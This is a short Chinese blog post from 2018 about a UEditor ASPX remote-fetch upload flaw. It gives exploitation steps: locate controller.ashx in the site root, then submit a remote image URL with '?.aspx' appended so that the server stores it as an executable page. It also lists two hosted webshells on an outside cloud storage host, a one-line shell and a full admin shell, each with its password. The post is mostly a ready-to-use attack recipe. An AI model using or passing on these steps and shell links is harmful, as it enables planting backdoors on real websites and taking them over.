本文最后更新于 2018年10月07日 19:12 可能会因为没有更新而失效。如已失效或需要修正,请留言!

ueditor编辑器上传漏洞-ChaBug安全

ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

controller.ashx 文件默认在网站根目录

输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx

 

一句话 密码 xz

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

大马 密码 r00ts

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx

喜欢这篇文章的话就点一点喜欢吧!